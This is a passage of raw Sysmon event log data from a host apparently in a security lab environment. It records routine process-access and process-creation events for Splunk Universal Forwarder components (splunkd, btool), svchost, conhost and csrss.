Files\SplunkUniversalForwarder\bin\splunk.exe{D28789B6-7C76-5FA1-5000-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1815e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001920Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.136{D28789B6-7C76-5FA1-5000-000000008801}3896C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" check --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7C75-5FA1-4D00-000000008801}4032C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001919Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.081{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C75-5FA1-4F00-000000008801}4084C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001918Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:18.081{D28789B6-7C75-5FA1-4F00-000000008801}40843244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.988{D28789B6-7C77-5FA1-5C00-000000008801}39604080C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C77-5FA1-5C00-000000008801}3960C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002096Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002095Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002094Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002093Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002092Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002091Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002090Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002089Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C77-5FA1-5C00-000000008801}3960C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002088Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002087Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C77-5FA1-5B00-000000008801}40163928C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7C77-5FA1-5C00-000000008801}3960C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002086Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.743{D28789B6-7C77-5FA1-5C00-000000008801}3960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C77-5FA1-5B00-000000008801}4016C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002085Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C77-5FA1-5B00-000000008801}4016C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002084Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002083Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002082Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002081Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002080Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002079Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002078Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002077Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:19.738{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002076Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 